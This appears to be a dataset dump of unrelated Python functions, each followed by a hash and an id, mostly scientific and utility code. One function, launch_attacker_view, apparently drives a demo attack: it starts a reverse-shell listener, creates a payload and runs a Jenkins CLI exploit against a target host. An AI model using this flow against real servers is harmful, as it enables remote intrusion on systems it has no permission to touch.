content: string (lengths 35 to 762k)
sha1: string (length 40)
id: int64 (0 to 3.66M)
def nonsingular_concat(X, vector): """Appends vector to matrix X iff the resulting matrix is nonsingular. Args: X (np.array): NxM Matrix to be appended to vector (np.array): Nx1 vector to be appended to X Returns: new_X (np.array): Nx(M+1) Matrix or None """ # Cast vector to matrix vector = np.atleast_2d(vector) # Append vector as new row at bottom of matrix new_X = np.concatenate((X, vector), axis=0) # Check if matrix is still non-singular if new_X.shape[0] == np.linalg.matrix_rank(new_X): return new_X else: return None
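A minimal usage sketch of the function above, assuming it and `numpy` are in scope. Appending a linearly independent row keeps the stacked matrix at full row rank, while a dependent row makes the function return None.

```python
import numpy as np

X = np.array([[1.0, 0.0, 0.0],
              [0.0, 1.0, 0.0]])

# Independent row: the 3x3 result has rank 3, so the new matrix is returned.
print(nonsingular_concat(X, np.array([0.0, 0.0, 1.0])))

# Dependent row (sum of the first two): rank stays at 2, so None is returned.
print(nonsingular_concat(X, np.array([1.0, 1.0, 0.0])))
```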
68a1f6f8b0ea5e14fbbcacc618f2d19b07814813
3,652,432
from typing import Union def get_oxidation_state(element: Union[str, Element]) -> int: """Get a typical oxidation state If it doesn't exist in the database, 0 is returned. Args: element (str/ Element): Input element Return: Oxidation state of the element. """ try: return oxidation_state_dict[str(element)] except KeyError: logger.warning(f"Oxidation state: {element} is unavailable. Set 0.") return 0
24187bd8eb5c6d5794f1e287c676b0f16c170d55
3,652,433
from typing import Callable def __quality_indexes( graph: nx.Graph, communities: object, scoring_function: Callable[[object, object], float], summary: bool = True, ) -> object: """ :param graph: NetworkX/igraph graph :param communities: NodeClustering object :param scoring_function: callable that computes the score of a community given the graph and the community subgraph :param summary: boolean. If **True** an aggregated score for the partition is returned, otherwise individual community scores. Default **True**. :return: If **summary==True** a FitnessResult object, otherwise a list of floats. """ graph = convert_graph_formats(graph, nx.Graph) values = [] for com in communities.communities: community = nx.subgraph(graph, com) values.append(scoring_function(graph, community)) if summary: return FitnessResult( min=min(values), max=max(values), score=np.mean(values), std=np.std(values) ) return values
a328ec08bef43248c6e8fd7a0f11901801b0e2a5
3,652,434
def readFromDB_DSC_authorityKey(authorityKey: bytes, connection: Connection) -> DocumentSignerCertificate: """Read DSC objects from the database by authority key.""" try: logger.info("Reading DSC object from database with authority key.") return connection.getSession().query(DocumentSignerCertificateStorage).filter(DocumentSignerCertificateStorage.authorityKey == authorityKey).all() except Exception: raise DocumentSignerCertificateStorageError("Problem with reading the object")
34cff097201af92d337568094b8d48577f7e440f
3,652,436
def history_report(history, config=None, html=True): """ Test a model and save a history report. Parameters ---------- history : memote.HistoryManager The manager grants access to previous results. config : dict, optional The final test report configuration. html : bool, optional Whether to render the report as full HTML or JSON (default True). """ if config is None: config = ReportConfiguration.load() report = HistoryReport(history=history, configuration=config) if html: return report.render_html() else: return report.render_json()
8ba956c959b72f37b570b91ea4f01287eb8783c6
3,652,437
def derive_from_dem(dem): """derive slope and flow direction from a DEM. Results are returned in a dictionary that contains references to ArcPy Raster objects stored in the "in_memory" (temporary) workspace """ # set the snap raster for subsequent operations env.snapRaster = dem # calculate flow direction for the whole DEM flowdir = FlowDirection(in_surface_raster=dem, force_flow="NORMAL") flow_direction_raster = so("flowdir","random","in_memory") flowdir.save(flow_direction_raster) # calculate slope for the whole DEM slope = Slope(in_raster=dem, output_measurement="PERCENT_RISE", method="PLANAR") slope_raster = so("slope","random","in_memory") slope.save(slope_raster) return { "flow_direction_raster": Raster(flow_direction_raster), "slope_raster": Raster(slope_raster), }
4563e4ccd6695865c05c7a945dcc6244fb8af012
3,652,438
from typing import Optional def from_error_details(error: str, message: str, stacktrace: Optional[str]) -> BidiException: """Create specific WebDriver BiDi exception class from error details. Defaults to ``UnknownErrorException`` if `error` is unknown. """ cls = get(error) return cls(error, message, stacktrace)
238566bcf1092b685deebcadcf60c1905e585cb9
3,652,439
def tangential_proj(u, n): """ See for instance: https://link.springer.com/content/pdf/10.1023/A:1022235512626.pdf """ return (ufl.Identity(u.ufl_shape[0]) - ufl.outer(n, n)) * u
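The projector I - n n^T removes the component of u along the normal n. A plain NumPy check of the same formula, purely illustrative since the function above operates on UFL expressions rather than arrays:

```python
import numpy as np

n = np.array([0.0, 0.0, 1.0])   # unit normal
u = np.array([1.0, 2.0, 3.0])
P = np.eye(3) - np.outer(n, n)  # I - n n^T
print(P @ u)                    # [1. 2. 0.] -- normal component removed
print((P @ u) @ n)              # 0.0 -- the result is tangential to n
```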
92c8eafa222418221b2fb0e1b242dbd76696407d
3,652,440
def _RemoveEdges(tris, match): """tris is list of triangles. match is as returned from _MaxMatch or _GreedyMatch. Return list of (A,D,B,C) resulting from deleting edge (A,B) causing a merge of two triangles; append to that list the remaining unmatched triangles.""" ans = [] triset = set(tris) while len(match) > 0: (_, e, tl, tr) = match.pop() (a, b) = e if tl in triset: triset.remove(tl) if tr in triset: triset.remove(tr) c = _OtherVert(tl, a, b) d = _OtherVert(tr, a, b) if c is None or d is None: continue ans.append((a, d, b, c)) return ans + list(triset)
d2415f7275652254ca87a7621e483a29816a8083
3,652,441
def get_course_authoring_url(course_locator): """ Gets course authoring microfrontend URL """ return configuration_helpers.get_value_for_org( course_locator.org, 'COURSE_AUTHORING_MICROFRONTEND_URL', settings.COURSE_AUTHORING_MICROFRONTEND_URL )
cea917ca211be1fdd1b4cf028652101392fd80ab
3,652,442
def sumDwellStateSub(params): """Threaded, sums dwell times with 1 day seeing no change & accounting for fractional days""" (dfIn,dwellTime,weight) = params dfOut = dfIn.copy(deep=True) while dwellTime > 1: if dwellTime > 2: increment = 1 else: increment = dwellTime-1 dfOut += dfShift(dfIn,1) * increment dwellTime += -1 return dfOut * weight
47ab530bfad9a321bf349e7542f279aae0958a9b
3,652,443
def launch_attacker_view(): """ Accepts a JSON payload with the following structure: { "target": "nlb-something.fqdn.com", "attacker": "1.2.3.4" } If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect :return: Simple String response for now """ managed_instances = get_managed_instances() if request.method == 'GET': return render_template('routing/attacker_view.html', log_group=log_group, attacker_ip=attacker_ip, managed_instances=managed_instances, gd_events_of_interest=gd_events_of_interest, target_ip=target_ip) if request.method == 'POST': logger.info('Attacker is {} and Victim is {}'.format(attacker_ip, target_ip)) print('Attacker is {} and Victim is {}'.format(attacker_ip, target_ip)) if target_ip == "" or attacker_ip == "": logger.info('Incorrect Json format!') print(request.payload) res = make_response(jsonify( { "result": "error", "message": "ERROR - Incorrect Json format" }), 200) res.headers['Content-type'] = 'application/json' return res # Run auto_sploit.sh _launch_listener() logger.info('launching listener process') # # Create the payload from the attacker source ip input create_payload() # Run the exploit jenkins_cli_url = 'http://' + target_ip + ':80/cli' # # Get an initial session id with download session = exploit_get_sessionid(jenkins_cli_url) # if session: # Try and upload payload if upload_chunked(jenkins_cli_url, session, "asdf"): logger.info('Exploit_launched_ok') res = make_response(jsonify( { "result": "success", "message": "SUCCESS - auto-sploit launched!" }), 200) res.headers['Content-type'] = 'application/json' return res else: logger.info('Failed to launch exploit') res = make_response(jsonify( { "result": "error", "message": "ERROR - Unable to run exploit" }), 200) res.headers['Content-type'] = 'application/json' return res
2c987a2b552fa5cfc6e85240c71d496fe43785c3
3,652,444
import copy def stretch(alignment, factor): """Time-stretch the alignment by a constant factor""" # Get phoneme durations durations = [factor * p.duration() for p in alignment.phonemes()] alignment = copy.deepcopy(alignment) alignment.update(durations=durations) return alignment
1ea58c32509365d503379df616edd00718cfca19
3,652,445
def _read_node( data, pos, md_total ): """ 2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2 The quantity of child nodes. The quantity of metadata entries. Zero or more child nodes (as specified in the header). """ child_count = data[ pos ] pos += 1 md_count = data[ pos ] pos += 1 for i in range( child_count ): pos, md_total = _read_node( data, pos, md_total ) for m in range( md_count ): md_total += data[ pos ] pos += 1 return ( pos, md_total )
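A quick check of the recursive parser against the small tree quoted in the docstring (2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2), assuming the function is in scope: the metadata entries sum to 138 and the final position equals the input length.

```python
data = [2, 3, 0, 3, 10, 11, 12, 1, 1, 0, 1, 99, 2, 1, 1, 2]
pos, md_total = _read_node(data, 0, 0)
print(pos, md_total)  # 16 138
```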
768036031ab75b532d667769477f8d3144129ac8
3,652,450
def _large_flag_fit(x, yDat, yFit, initz, speciesDict, minSize, errBound): """ Attempts to more robustly fit saturated lyman alpha regions that have not converged to satisfactory fits using the standard tools. Uses a preselected sample of a wide range of initial parameter guesses designed to fit saturated lines (see get_test_lines). **Parameters** :x: (N) ndarray array of wavelength :ydat: (N) ndarray array of desired flux profile to be fitted for the wavelength space given by x. Same size as x. :yFit: (N) ndarray array of flux profile fitted for the wavelength space given by x already. Same size as x. :initz: float redshift to try putting first line at (maximum absorption for region) :speciesDict: dictionary dictionary containing all relevant parameters needed to create an absorption line of a given species (f,Gamma,lambda0) as well as max and min values for parameters to be fit :minsize: float minimum absorption allowed for a line to still count as a line given in normalized flux (ie: for minSize=.9, only lines with minimum flux less than .9 will be fitted) :errbound: float maximum total error allowed for an acceptable fit **Returns** :bestP: (3,) ndarray array of best parameters if a good enough fit is found in the form [[N1,b1,z1], [N2,b2,z2],...] """ #Set up some initial line guesses lineTests = _get_test_lines(initz) #Keep track of the lowest achieved error bestError = 1000 #Iterate through test line guesses for initLines in lineTests: if initLines[1,0]==0: initLines = np.delete(initLines,1,axis=0) #Do fitting with initLines as first guess linesP,flag=_complex_fit(x,yDat,yFit,initz, minSize,errBound,speciesDict,initP=initLines) #Find error of last fit yNewFit=_gen_flux_lines(x,linesP,speciesDict) dif = yFit*yNewFit-yDat errSq=sum(dif**2) #If error lower, keep track of the lines used to make that fit if errSq < bestError: bestError = errSq bestP = linesP if bestError>10*errBound*len(x): return [] else: return bestP
c065e9e1500977dfa1a522ebd238d2e71e188c6a
3,652,451
from typing import Type def mse_large_arrays_masked(dataA: 'LargeArray', dataB: 'LargeArray', mask: 'LargeArray', dtype: Type, batchSizeFlat=1e8): """ Compute MSE between two HDF datasets, considering elements where the mask is set to true (one). Computation is performed in batches to decrease memory requirements. """ if dataA.shape != dataB.shape or dataA.shape != mask.shape: raise ValueError("Arguments should have equal shapes, {}, {} and {} given." .format(dataA.shape, dataB.shape, mask.shape)) sum = 0.0 count = 0 for batchStart, batchEnd in get_batch_indices(dataA.shape, dtype, batchSizeFlat): batchMask = mask[batchStart:batchEnd] diff = batchMask * (dataA[batchStart:batchEnd].astype(dtype) - dataB[batchStart:batchEnd].astype(dtype)) square = np.square(diff) nonzeroNumber = np.count_nonzero(batchMask) sum += np.sum(square) count += nonzeroNumber return sum / count if count > 0 else float('nan')
27636fc32d208d544b0b2f9790015e6f3d86a69d
3,652,452
import copy def xml_elem_or_str_to_text(elem_or_xmlstr, default_return=""): """ Return string with all tags stripped out from either etree element or xml marked up string If string is empty or None, return the default_return >>> root = etree.fromstring(test_xml) >>> xml_elem_or_str_to_text(test_xml, None)[0:100] 'this is just authoring test stuff\\n whatever is in the abstract\\n \\n ' >>> xml_elem_or_str_to_text(root, None)[0:100] 'this is just authoring test stuff\\n whatever is in the abstract\\n \\n ' >>> root = etree.fromstring("<myxml>this <b>is <i>really</i><empty/></b> xml.</myxml>", None) #mixed content element >>> xml_elem_or_str_to_text(root, None) 'this is really xml.' >>> isinstance(xml_elem_or_str_to_text(root, None), str) # make sure it's string True >>> xml_elem_or_str_to_text(xml_xpath_return_textsingleton(root, "pxxx", ""), None) """ ret_val = default_return if elem_or_xmlstr is None or elem_or_xmlstr == "": ret_val = default_return elif isinstance(elem_or_xmlstr, lxml.etree._ElementUnicodeResult): ret_val = "%s" % elem_or_xmlstr # convert to string # just in case the caller sent a string. else: try: if isinstance(elem_or_xmlstr, str): parser = lxml.etree.XMLParser(encoding='utf-8', recover=True) elem = etree.fromstring(elem_or_xmlstr.encode("utf8"), parser) else: elem = copy.copy(elem_or_xmlstr) # etree will otherwise change calling parm elem_or_xmlstr when stripping except Exception as err: logger.error(err) ret_val = default_return try: etree.strip_tags(elem, '*') inner_text = elem.text if inner_text: ret_val = inner_text.strip() else: ret_val = default_return except Exception as err: logger.error("xmlElemOrStrToText: ", err) ret_val = default_return if ret_val == "": ret_val = default_return return ret_val
1e13c74d3d7d69fdd1ce8011384e1ee564f366f1
3,652,453
def sequence_equals(sequence1, sequence2): """ Inspired by django's self.assertSequenceEquals Useful for comparing lists with querysets and similar situations where simple == fails because of different type. """ assert len(sequence1) == len(sequence2), (len(sequence1), len(sequence2)) for item_from_s1, item_from_s2 in zip(sequence1, sequence2): assert item_from_s1 == item_from_s2, (item_from_s1, item_from_s2) return True
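A small illustration, assuming the helper is importable: the element-wise comparison lets a list and a tuple with the same items compare equal, which a plain `==` between the containers would not.

```python
assert sequence_equals([1, 2, 3], (1, 2, 3))  # passes: same length, same items
assert [1, 2, 3] != (1, 2, 3)                 # container-level == is False across types
```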
38016a347caf79458bb2a872d0fd80d6b813ba33
3,652,454
def statistical_features(ds, exclude_col_names: list = [], feature_names=['mean', 'median', 'stddev', 'variance', 'max', 'min', 'skew', 'kurt', 'sqr']): """ Compute statistical features. Args: ds (DataStream): Windowed/grouped DataStream object exclude_col_names list(str): name of the columns on which features should not be computed feature_names list(str): names of the features. Supported features are ['mean', 'median', 'stddev', 'variance', 'max', 'min', 'skew', 'kurt', 'sqr', 'zero_cross_rate' Returns: DataStream object with all the existing data columns and FFT features """ exclude_col_names.extend(["timestamp", "localtime", "user", "version"]) data = ds._data._df.drop(*exclude_col_names) df_column_names = data.columns basic_schema = StructType([ StructField("timestamp", TimestampType()), StructField("localtime", TimestampType()), StructField("user", StringType()), StructField("version", IntegerType()), StructField("start_time", TimestampType()), StructField("end_time", TimestampType()) ]) features_list = [] for cn in df_column_names: for sf in feature_names: features_list.append(StructField(cn + "_" + sf, FloatType(), True)) features_schema = StructType(basic_schema.fields + features_list) def calculate_zero_cross_rate(series): """ How often the signal changes sign (+/-) """ series_mean = np.mean(series) series = [v - series_mean for v in series] zero_cross_count = (np.diff(np.sign(series)) != 0).sum() return zero_cross_count / len(series) def get_sqr(series): sqr = np.mean([v * v for v in series]) return sqr @pandas_udf(features_schema, PandasUDFType.GROUPED_MAP) def get_stats_features_udf(df): results = [] timestamp = df['timestamp'].iloc[0] localtime = df['localtime'].iloc[0] user = df['user'].iloc[0] version = df['version'].iloc[0] start_time = timestamp end_time = df['timestamp'].iloc[-1] df.drop(exclude_col_names, axis=1, inplace=True) if "mean" in feature_names: df_mean = df.mean() df_mean.index += '_mean' results.append(df_mean) if "median" in feature_names: df_median = df.median() df_median.index += '_median' results.append(df_median) if "stddev" in feature_names: df_stddev = df.std() df_stddev.index += '_stddev' results.append(df_stddev) if "variance" in feature_names: df_var = df.var() df_var.index += '_variance' results.append(df_var) if "max" in feature_names: df_max = df.max() df_max.index += '_max' results.append(df_max) if "min" in feature_names: df_min = df.min() df_min.index += '_min' results.append(df_min) if "skew" in feature_names: df_skew = df.skew() df_skew.index += '_skew' results.append(df_skew) if "kurt" in feature_names: df_kurt = df.kurt() df_kurt.index += '_kurt' results.append(df_kurt) if "sqr" in feature_names: df_sqr = df.apply(get_sqr) df_sqr.index += '_sqr' results.append(df_sqr) output = pd.DataFrame(pd.concat(results)).T basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time]], columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time']) return basic_df.assign(**output) # check if datastream object contains grouped type of DataFrame if not isinstance(ds._data, GroupedData): raise Exception( "DataStream object is not grouped data type. Please use 'window' operation on datastream object before running this algorithm") data = ds._data.apply(get_stats_features_udf) return DataStream(data=data, metadata=Metadata())
544b32b3f909c8f98ae18ae43006719105627a85
3,652,455
def second_order_difference(t, y): """ Calculate the second order difference. Args: t: ndarray, the list of the three independent variables y: ndarray, three values of the function at every t Returns: double: the second order difference of given points """ # claculate the first order difference first_order_difference = (y[1:] - y[:-1]) / (t[1:] - t[:-1]) return (first_order_difference[1] - first_order_difference[0]) / (t[2] - t[0])
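A worked example, assuming the function and NumPy are in scope: for y = t^2 sampled at t = 0, 1, 2 the first-order differences are 1 and 3, so the returned value is (3 - 1) / (2 - 0) = 1, i.e. the second divided difference (half the true second derivative of a quadratic).

```python
import numpy as np

t = np.array([0.0, 1.0, 2.0])
y = t ** 2
print(second_order_difference(t, y))  # 1.0
```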
40e37d2b34104772966afc34e41c1ebc742c9adf
3,652,456
def timeDelay( gpsTime, rightAscension, declination, unit, det1, det2 ): """ timeDelay( gpsTime, rightAscension, declination, unit, det1, det2 ) Calculates the time delay in seconds between the detectors 'det1' and 'det2' (e.g. 'H1') for a sky location at (rightAscension and declination) which must be given in certain units ('radians' or 'degree'). The time is passed as GPS time. A positive time delay means the GW arrives first at 'det2', then at 'det1'. Example: antenna.timeDelay( 877320548.000, 355.084,31.757, 'degree','H1','L1') 0.0011604683260994519 Given these values, the signal arrives first at detector L1, and 1.16 ms later at H1 """ # check the input arguments if unit =='radians': ra_rad = rightAscension de_rad = declination elif unit =='degree': ra_rad = rightAscension/180.0*pi de_rad = declination/180.0*pi else: raise ValueError("Unknown unit %s" % unit) # check input values if ra_rad<0.0 or ra_rad> 2*pi: raise ValueError( "ERROR. right ascension=%f "\ "not within reasonable range."\ % (rightAscension)) if de_rad<-pi or de_rad> pi: raise ValueError( "ERROR. declination=%f not within reasonable range."\ % (declination)) if det1 == det2: return 0.0 gps = lal.LIGOTimeGPS( gpsTime ) x1 = lalsimulation.DetectorPrefixToLALDetector(det1).location x2 = lalsimulation.DetectorPrefixToLALDetector(det2).location timedelay = lal.ArrivalTimeDiff(list(x1), list(x2), ra_rad, de_rad, gps) return timedelay
eb0f444ad2a2be0cf10d62fdbe8b41c8d924c798
3,652,457
def RngBinStr(n): """ Takes a int which represents the length of the final binary number. Returns a string which represents a number in binary where each char was randomly generated and has lenght n. """ num = "" for i in range(n): if rng.random() < 0.5: num += "0" else: num += "1" return num
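A usage sketch under the assumption (not shown in the snippet) that `rng` is the standard `random` module; seeding makes the draw reproducible.

```python
import random as rng

rng.seed(0)
print(RngBinStr(8))  # an 8-character string of random '0'/'1' characters
```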
cf063532425b51243f3ba95f90df892bda121363
3,652,458
def get_bdbox_from_heatmap(heatmap, threshold=0.2, smooth_radius=20): """ Function to extract bounding boxes of objects in heatmap Input : Heatmap : matrix extracted with GradCAM. threshold : value defining the values we consider , increasing it increases the size of bounding boxes. smooth_radius : radius on which each pixel is blurred. Output : returned_objects : List of bounding boxes, N_objects * [ xmin, xmax, ymin, ymax, width, height ] """ # If heatmap is all zeros i initialize a default bounding box which wraps entire image xmin = 0 xmax = heatmap.shape[1] ymin = 0 ymax = heatmap.shape[0] width = xmax-xmin height = ymax-ymin returned_objects = [] # Count if there is any "hot" value on the heatmap count = (heatmap > threshold).sum() # Blur the image to have continuous regions heatmap = ndimage.uniform_filter(heatmap, smooth_radius) # Threshold the heatmap with 1 for values > threshold and 0 else thresholded = np.where(heatmap > threshold, 1, 0) # Apply morphological filter to fill potential holes in the heatmap thresholded = ndimage.morphology.binary_fill_holes(thresholded) # Detect all independant objects in the image labeled_image, num_features = ndimage.label(thresholded) objects = ndimage.measurements.find_objects(labeled_image) # We loop in each object ( if any is detected ) and append it to a global list if count > 0: for obj in objects: x = obj[1] y = obj[0] xmin = x.start xmax = x.stop ymin = y.start ymax = y.stop width = xmax-xmin height = ymax-ymin returned_objects.append([xmin, xmax, ymin, ymax, width, height]) else: returned_objects.append([xmin, xmax, ymin, ymax, width, height]) return returned_objects
0a7397263cf2b8b238679f3cd54b8bcb67553387
3,652,459
def get_request(request_id, to_json=False, session=None): """ Get a request or raise a NoObject exception. :param request_id: The id of the request. :param to_json: return json format. :param session: The database session in use. :raises NoObject: If no request is founded. :returns: Request. """ try: query = session.query(models.Request).with_hint(models.Request, "INDEX(REQUESTS REQUESTS_SCOPE_NAME_IDX)", 'oracle')\ .filter(models.Request.request_id == request_id) ret = query.first() if not ret: return None else: if to_json: return ret.to_dict_json() else: return ret.to_dict() except sqlalchemy.orm.exc.NoResultFound as error: raise exceptions.NoObject('request request_id: %s cannot be found: %s' % (request_id, error))
41d34057b859a88818866a03392ec6f96d2b4983
3,652,460
def gen_multi_correlated(N, n, c_mat, p_arr, use_zscc=False, verify=False, test_sat=False, pack_output=True, print_stat=False): """Generate a set of bitstreams that are correlated according to the supplied correlation matrix""" #Test if the desired parameters are satisfiable sat_result = corr_sat(N, n, c_mat, p_arr, for_gen=True, print_stat=print_stat, use_zscc=use_zscc) if not sat_result: if print_stat: print("SCC MATRIX NOT SATISFIABLE") return test_sat #Don't fail the test if we were intending to check correlation satisfiability sat = sat_result[0] if not test_sat and not sat: if print_stat: print("SCC MATRIX NOT SATISFIABLE") return False Dij = sat_result[1] N_arr = sat_result[2] if print_stat: print(c_mat) print(p_arr) #Perform the generation bs_arr = np.zeros((n,N), dtype=np.uint8) def gmc_rec(i): """Recursive portion of gen_multi_correlated""" nonlocal N, n, N_arr, Dij, bs_arr if i == n-1: sentinel = 's' last_cand = next(next_cand(N, N_arr[i], Dij, bs_arr, i), sentinel) if last_cand is not sentinel: bs_arr[i, :] = last_cand return True else: return False else: for cand in next_cand(N, N_arr[i], Dij, bs_arr, i): bs_arr[i, :] = cand if gmc_rec(i+1): return True return False gmc_result = gmc_rec(0) if not test_sat and not gmc_result: if print_stat: print("GEN_MULTI_CORRELATED FAILED: Couldn't find a valid solution") return False if test_sat: if gmc_result != sat: print("Generation result: '{}' did not match scc sat result: '{}'. Corr mat: \n{}. p arr: {}" \ .format(gmc_result, sat, c_mat, p_arr)) return False else: print("SCC SAT TEST PASS. Corr mat: \n{}. p arr: {}".format(c_mat, p_arr)) #Verify the generation if print_stat: print(bs_arr) if verify and gmc_result: cmat_actual = bs.get_corr_mat(bs_arr, bs_len=N, use_zscc=use_zscc) if np.any(np.abs(cmat_actual - c_mat) > 1e-3): if print_stat: print("GEN_MULTI_CORRELATED FAILED: Resulting SCC Matrix doesn't match: \n {} \n should be \n {}" .format(cmat_actual, c_mat)) return False for idx, bs_i in enumerate(bs_arr): p_actual = bs.bs_mean(np.packbits(bs_i), bs_len=N) if np.any(np.abs(p_actual - p_arr[idx]) > 1e-3): if print_stat: print("GEN_MULTI_CORRELATED FAILED: Resulting probability is incorrect: {} (should be {})".format(p_actual, p_arr[idx])) return False if print_stat: print("GEN_MULTI_CORRELATED PASS") if pack_output: return True, np.packbits(bs_arr, axis=1) else: return True, bs_arr
0b1cf206e92363910877b0202b9fb94d377358a3
3,652,461
def rxzero_traj_eval_grad(parms, t_idx): """ Analytical gradient for evaluated trajectory with respect to the log-normal parameters It is expected to boost the optimization performance when the parameters are high-dimensional... """ v_amp_array = np.array([rxzero_vel_amp_eval(parm, t_idx) for parm in parms]) phi_array = np.array([rxzero_normal_Phi_eval(parm, t_idx) for parm in parms]) v_amp_grad_array = np.array([np.vstack([rxzero_vel_amp_eval_grad(parm[0:4], t_idx).T, np.zeros((2, len(t_idx)))]).T for parm in parms]) phi_grad_array = np.array([rxzero_normal_Phi_eval_grad(parm, t_idx) for parm in parms]) v_x_grad = np.concatenate([(v_amp_grad_array[parm_idx].T * np.cos(phi_array[parm_idx]) - v_amp_array[parm_idx] * np.sin(phi_array[parm_idx]) * phi_grad_array[parm_idx].T).T for parm_idx in range(len(parms))], axis=1) v_y_grad = np.concatenate([(v_amp_grad_array[parm_idx].T * np.sin(phi_array[parm_idx]) + v_amp_array[parm_idx] * np.cos(phi_array[parm_idx]) * phi_grad_array[parm_idx].T).T for parm_idx in range(len(parms))], axis=1) dt = t_idx[1] - t_idx[0] pos_x_grad = np.cumsum(v_x_grad, axis=0) * dt pos_y_grad = np.cumsum(v_y_grad, axis=0) * dt return np.array([pos_x_grad, pos_y_grad]), np.array([v_x_grad, v_y_grad])
47aa04aa2096f472dd0f5612c95903fd638cb1d0
3,652,462
import traceback def exec_geoprocessing_model(): """算法模型试运行测试 根据算法模型的guid标识,算法模型的输入参数,运行算法模型 --- tags: - system_manage_api/geoprocessing_model parameters: - in: string name: guid type: string required: true description: 流程模型的guid - in: array name: param type: array required: true description: 算法模型的初始化参数 responses: 200: description: 算法模型运行的结果,结果数组 schema: properties: geoprocessing_model_result: type: object description: 结果数组,[{"function_name":"","value":""},{},...] 500: description: 服务运行错误,异常信息 schema: properties: errMessage: type: string description: 异常信息,包括异常信息的类型 traceMessage: type: string description: 异常更加详细的信息,包括异常的位置 """ try: # exe_functinons_param = {} # exe_functinons_already = {} # exe_functinons_result = {} # param_dic = {x["guid"]: x["default_value"] for x in list(request.json.get('param', []))} # #根据算法模型的guid,从数据库中获取所有的函数信息 # #包括模块、名函数名、参数名称等 # pg_helper = PgHelper() # records = pg_helper.query_datatable( # '''select module_name,function_name,parameter_name,guid, # from_module_name,from_function_name,from_name # from gy_geoprocessing_model_node # where geoprocessing_model_guid=%s''', (request.json.get('guid', None),)) # for x in records: # if not (x["module_name"], x["function_name"]) in exe_functinons_param: # exe_functinons_param[(x["module_name"], x["function_name"])] = {} # exe_functinons_already[(x["module_name"], x["function_name"])] = False # if x["guid"] in param_dic: # exe_functinons_param[(x["module_name"], x["function_name"])][x["parameter_name"]] = param_dic[x["guid"]] # else: # exe_functinons_param[(x["module_name"], x["function_name"])][x["parameter_name"]] = None # exe_functinons_result[(x["from_module_name"], x["from_function_name"], x["from_name"])] = (x["module_name"], x["function_name"], # x["parameter_name"]) # flag_loop = True # latest_result = {} # while flag_loop: # flag_loop = False # #循环每一个函数 # for key_f in exe_functinons_param: # #函数已经运行过 # if exe_functinons_already[key_f]: # continue # #如果一个函数的所有参数值都不是None,在运行所有的函数 # func_exeable = True # for key_p in exe_functinons_param[key_f]: # if exe_functinons_param[key_f][key_p] is None: # func_exeable = False # flag_loop = True # break # #运行函数 # if func_exeable: # latest_result = {} # exe_functinons_already[key_f] = True # temp_result = geoprocessing_algorithm.__dict__[key_f[0]].__dict__[key_f[1]](**exe_functinons_param[key_f]) # #将结果赋给相应的参数 # for key_re in temp_result: # if key_f + (key_re,) in exe_functinons_result: # exe_functinons_param[exe_functinons_result[key_f + # (key_re,)][:-1]][exe_functinons_result[key_f + # (key_re,)][-1]] = temp_result[key_re] # latest_result[key_f] = temp_result # #将最新一次的运行结果进行解析,返回前段 # ret_string = "" # for key_f in latest_result: # for x in geoprocessing_algorithm.__dict__[key_f[0]].__dict__[key_f[1]].__annotations__["return"]: # if x["name_en"] in latest_result[key_f]: # ret_string = ret_string + x["name_zh_cn"] + ":" + str(latest_result[key_f][x["name_en"]]) + "\n" # return jsonify({"geoprocessing_model_result": ret_string}), 200 return jsonify({}), 200 except Exception as exception: return jsonify({"errMessage": repr(exception), "traceMessage": traceback.format_exc()}), 500
8cfcc56117747c78d8b2c4fc10dc29fa8115aa67
3,652,463
import requests def perform_extra_url_query(url): """Performs a request to the URL supplied Arguments: url {string} -- A URL directing to another page of results from the NASA API Returns: Response object -- The response received from the NASA API """ response = requests.request("GET", url) check_query_was_successful(response) return response
7d5fe2d6467d90e1f7e85d2fc51187a36f62305d
3,652,464
from org.optaplanner.optapy import PythonWrapperGenerator # noqa def problem_fact_property(fact_type: Type) -> Callable[[Callable[[], List]], Callable[[], List]]: """Specifies that a property on a @planning_solution class is a problem fact. A problem fact must not change during solving (except through a ProblemFactChange event). The constraints in a ConstraintProvider rely on problem facts for ConstraintFactory.from(Class). Do not annotate planning entities as problem facts: they are automatically available as facts for ConstraintFactory.from(Class). """ def problem_fact_property_function_mapper(getter_function: Callable[[], Any]): ensure_init() from org.optaplanner.core.api.domain.solution import ProblemFactProperty as JavaProblemFactProperty getter_function.__optapy_return = get_class(fact_type) getter_function.__optaplannerPlanningEntityCollectionProperty = { 'annotationType': JavaProblemFactProperty } return getter_function return problem_fact_property_function_mapper
068cdbc1a8dab95b5a742740195b4fdaf595de2a
3,652,465
def _load_method_arguments(name, argtypes, args): """Preload argument values to avoid freeing any intermediate data.""" if not argtypes: return args if len(args) != len(argtypes): raise ValueError(f"{name}: Arguments length does not match argtypes length") return [ arg if hasattr(argtype, "_type_") else argtype.from_param(arg) for (arg, argtype) in zip(args, argtypes) ]
0eb6a16c2e4c1cd46a114923f81e93af331c3d6e
3,652,466
import json def crash_document_add(key=None): """ POST: api/vX/crash/<application_key> add a crash document by web service """ if 'Content-Type' not in request.headers or request.headers['Content-Type'].find('multipart/form-data') < 0: return jsonify({ 'success': False, 'message': 'input error' }) reports = request.files.getlist('reports') if reports: ds = DocumentService() for report in reports: documents = json.loads(report.read()) if not isinstance(documents, list): documents = [documents] for document in documents: result, msg = ds.add_document(key, document, DocumentModel.crash) if not result: # error return abort(417, {'message': msg}) # success return jsonify({'success': True, 'message': None}) # no reports return abort(400, {'message': 'input error'})
669c30141d5fb50128b3c60577433938daec5a2a
3,652,467
def log_data(model, action, before, after, instance): """Logs mutation signals for Favourite and Category models Args: model(str): the target class of the audit-log: favourite or category action(str): the type of mutation to be logged: create, update, delete before(dict): the previous value of the data mutated after(dict): the new value of the data mutated instance(object): the favourite or category instance being mutated Returns: object: instance of AuditLog created for the mutation """ log = { 'model': model, 'action': action, 'date': timezone.now(), 'before': before, 'after': after, 'resource_id': instance.id } return AuditLog.objects.create(**log)
f23ef8d2a759130ac55d3dc55f4497099776414f
3,652,468
import requests def download(url, local_filename, chunk_size=1024 * 10): """Download `url` into `local_filename'. :param url: The URL to download from. :type url: str :param local_filename: The local filename to save into. :type local_filename: str :param chunk_size: The size to download chunks in bytes (10Kb by default). :type chunk_size: int :rtype: str :returns: The path saved to. """ response = requests.get(url) with open(local_filename, 'wb') as fp: for chunk in response.iter_content(chunk_size=chunk_size): if chunk: fp.write(chunk) return fp.name
